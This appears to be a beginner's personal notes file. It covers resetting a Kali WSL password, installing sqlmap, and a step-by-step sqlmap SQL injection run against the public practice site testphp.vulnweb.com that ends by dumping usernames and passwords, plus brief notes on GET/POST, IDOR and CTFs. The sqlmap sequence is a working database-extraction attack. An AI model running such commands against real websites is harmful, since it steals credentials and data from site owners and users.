PASSWORD RESET :-

Ensure Kali is not running
Open a command prompt (cmd.exe)
From the command prompt, run kali config --default-user root
Run Kali, you should login as root automatically
In Kali, run passwd user where user is the username of the account you wish the reset the password for, i.e. passwd bob
Follow the prompts to reset the password and then type exit to close Kali
From the command prompt, run kali config --default-user user where user is the username you have just reset the password for, i.e. kali config --default-user bob
Following these steps, you should be able to reset the password for your account in Kali on WSL.
_____________________________________________________________________________________________________________________________________

'pip install sqlmap' in command prompt

run sqlmap in powershell

_____________________________________________________________________________________________________________________________________

SQL INJECTION :-

SQLMAP COMMANDS TO HACK DATABASE OF THE VULNERABLE WEBSITE:-

=> sqlmap

=> sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs

=> sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -tables

=> sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns

=> sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C name,uname,pass --dump

-> then we got one entry which contains name uername and password .

_____________________________________________________________________________________________________________________________________
VULNERABILITIES :-

(1). GET => data is sent in the url of the request.
	 eg :- http://testphp.vulnweb.com/artists.php?artist=1

(2). POST => data is sent in the request body of the request and it's (query) isn't visible in the URL.

(3). IDOR=> Insecure Direct Object Refrence
	=> detting authorization withouut access.

_____________________________________________________________________________________________________________________________________

CTF :- Capture The Flag => game based on the real hacking.

_____________________________________________________________________________________________________________________________________